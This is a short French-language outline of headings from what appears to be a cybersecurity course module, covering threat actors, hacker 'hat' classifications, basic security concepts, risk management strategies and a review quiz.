🎭 13.8 — Acteurs de la menace et concepts fondamentaux

Classification des hackers par « chapeau »

Types d'acteurs de la menace

Concepts fondamentaux de securite

Strategies de gestion des risques

📝 13.9 — Quiz de revision

Points cles du Module 13